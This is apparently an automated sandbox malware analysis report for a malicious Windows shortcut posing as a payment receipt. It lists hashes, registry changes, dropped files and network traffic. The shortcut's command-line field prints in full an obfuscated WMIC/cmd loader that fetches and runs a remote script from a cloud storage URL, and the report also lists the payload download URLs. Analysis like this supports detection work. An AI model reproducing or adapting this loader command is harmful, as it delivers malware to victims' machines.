File name:	Comprovante_Zattini.390.lnk
Full analysis:	https://app.any.run/tasks/90b3e40b-f5cf-4b08-872b-14165186619c
Verdict:	Malicious activity
Threats:	A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection. Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email. Malware Trends Tracker >>>
Analysis date:	May 24, 2019, 14:06:35
OS:	Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:	loader trojan apt
Indicators:
MIME:	application/octet-stream
File info:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Description string, Has command line arguments, Icon number=23, Archive, ctime=Sun Nov 21 02:24:03 2010, mtime=Sun Nov 21 02:24:03 2010, atime=Sun Nov 21 02:24:03 2010, length=302592, window=hidenormalshowminimized
MD5:	A48A820F22CEB01A84A7E873ECC227DD
SHA1:	86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB
SHA256:	018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9
SSDEEP:	48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5

Flags:	IDList, LinkInfo, Description, CommandArgs, IconFile, Unicode, ExpString
FileAttributes:	Archive
CreateDate:	2010:11:21 04:24:03+01:00
AccessDate:	2010:11:21 04:24:03+01:00
ModifyDate:	2010:11:21 04:24:03+01:00
TargetFileSize:	302592
IconIndex:	23
RunWindow:	Show Minimized No Activate
HotKey:	(none)
TargetFileDOSName:	cmd.exe
DriveType:	Fixed Disk
VolumeLabel:	-
LocalBasePath:	C:\Windows\System32\cmd.exe
Description:	bmcxrs46lee90WYFrmxmes48iu30hWYFixxmudf7iqk4hOLFixvmef78iq26hELqicmved57iq26aELKcmvvhj57ge86dILKncbrhj67ue9dUUIJncxih466le90dY
CommandLineArguments:	/start /MIN %ComSpec% start /MIN %ComSpec% /V /C "set x=Cusf6:usf6\usf6\usf6Wusf6iusf6ndusf6owusf6s\usf6\susf6ysusf6tusf6eusf6musf63usf62usf6\usf6\usf6wusf6busf6eusf6m\usf6\Wusf6Musf6Iusf6C.eusf6xusf6e ousf6s gusf6eusf6t fusf65usf67usf6iusf6tusf66usf6husf6Eusf6Susf6, 6usf67usf6husf6iusf62usf66usf6ausf6, nusf6uusf6musf6busf6eusf6rusf6ousf6fusf6uusf6susf6eusf6rusf6susf6 /usf6fousf6rmusf6at:"husf6tusf6tusf6pusf6:usf6/usf6/susf6tusf6ousf6rusf6ausf6gusf6eusf6.usf6gusf6ousf6ousf6gusf6lusf6eusf6ausf6pusf6iusf6susf6.usf6cusf6ousf6musf6/usf6musf6iusf6dusf6gusf6ousf6lusf6dusf6eusf6musf6/usf60usf69usf6/usf6vusf6.usf6tusf6xusf6tusf6#usf60usf62usf65usf60usf64usf60usf6xusf6iusf6uusf6jusf66usf6rusf6lusf69usf6dusf6" &&echo %x:usf6=%\|%ComSpec%"
IconFileName:	%SystemRoot%\system32\imageres.dll
MachineID:	dedicado-web


(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	FileTracingMask
Value: 4294901760
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	ConsoleTracingMask
Value: 4294901760
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	MaxFileSize
Value: 1048576
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASAPI32
Operation:	write	Name:	FileDirectory
Value: %windir%\tracing
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:	write	Name:	EnableFileTracing
Value: 0
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:	write	Name:	EnableConsoleTracing
Value: 0
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:	write	Name:	FileTracingMask
Value: 4294901760
(PID) Process:	(1944) WMIC.exe	Key:	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\WMIC_RASMANCS
Operation:	write	Name:	ConsoleTracingMask
Value: 4294901760

PID	Process	Filename		Type
2212	WMIC.exe	C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\I0488CJO\vv[1].txt		xml
		MD5:—	SHA256:—
2680	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwa.jpg		binary
		MD5:—	SHA256:—
3808	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwc.jpg		binary
		MD5:—	SHA256:—
2356	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwgx.gif		binary
		MD5:—	SHA256:—
2428	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwdwwn.gif		binary
		MD5:—	SHA256:—
4072	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwdx.gif		binary
		MD5:—	SHA256:—
3076	cmd.exe	C:\Users\Public\Libraries\temporary\r1.log		text
		MD5:—	SHA256:—
2952	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwxa.~		executable
		MD5:—	SHA256:—
3208	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwb.jpg		binary
		MD5:—	SHA256:—
2904	certutil.exe	C:\Users\Public\Libraries\temporary\falxconxrenwg.gif		binary
		MD5:—	SHA256:—

PID	Process	Method	HTTP Code	IP	URL	CN	Type	Size	Reputation
—	—	GET	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwb.jpg.zip.log?622722882	US	text	247 Kb	whitelisted
—	—	HEAD	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwg.gif.zip.log?244653065	US	text	1.19 Mb	whitelisted
—	—	HEAD	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163	US	—	—	whitelisted
—	—	GET	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwa.jpg.zip.log?84824163	US	text	68.6 Kb	whitelisted
—	—	GET	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567	US	text	1.19 Mb	whitelisted
—	—	HEAD	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177	US	text	1.19 Mb	whitelisted
—	—	GET	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwgx.gif.zip.log?113828321	US	text	488 Kb	whitelisted
—	—	HEAD	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwxa.gif.zip.log?375221081	US	text	488 Kb	whitelisted
—	—	GET	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdx.gif.zip.log?217179177	US	text	1.19 Mb	whitelisted
—	—	HEAD	200	172.217.18.16:80	http://storage.googleapis.com/midgoldem/x/09/falxconxrenwdwwn.gif.zip.log?519675567	US	text	308 Kb	whitelisted

PID	Process	IP	Domain	ASN	CN	Reputation
—	—	172.217.18.16:80	storage.googleapis.com	Google Inc.	US	whitelisted
2212	WMIC.exe	172.217.18.16:80	storage.googleapis.com	Google Inc.	US	whitelisted
1944	WMIC.exe	172.217.18.16:80	storage.googleapis.com	Google Inc.	US	whitelisted

PID	Process	Class	Message
1944	WMIC.exe	A Network Trojan was detected	ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
1944	WMIC.exe	Misc activity	SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)
2212	WMIC.exe	A Network Trojan was detected	ET TROJAN HTML/Xbash Hex Encoded WScript.Shell Inbound - Stage 1
2212	WMIC.exe	Misc activity	SUSPICIOUS [PTsecurity] JS obfuscation (obfuscator.io)

General Info

Comprovante_Zattini.390.lnk

A48A820F22CEB01A84A7E873ECC227DD

86D8F3471AC1EB51C2C2671E75EBBEB7AFF72ACB

018C35D81207FA01DBC486E4294AE3B5AAD6F5B74ABBC2D25E9D25D0FB1131F9

48:8Ar11n9SAA446446EATYYjPi5w+K+IKYj5KcQzqG3DzvKr4Jo/x4OZaTGHK5:8w19It6tA7Hb3KY9KnbvKsJgOGgGq5

Software environment set and analysis options

Launch configuration

Software preset

Hotfixes

Behavior activities

MALICIOUS

Runs app for hidden code execution

Uses BITADMIN.EXE for downloading application

Registers / Runs the DLL via REGSVR32.EXE

SUSPICIOUS

Starts CMD.EXE for commands execution

Executable content was dropped or overwritten

Application launched itself

Starts CertUtil for decode files

INFO

Malware configuration

Static information

TRiD

EXIF

LNK

Video and screenshots

Processes

Behavior graph

Specs description

Process information

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Information

Modules

Registry activity

Modification events

Files activity

Dropped files

Network activity

HTTP requests

Connections

DNS requests

Threats

Debug output strings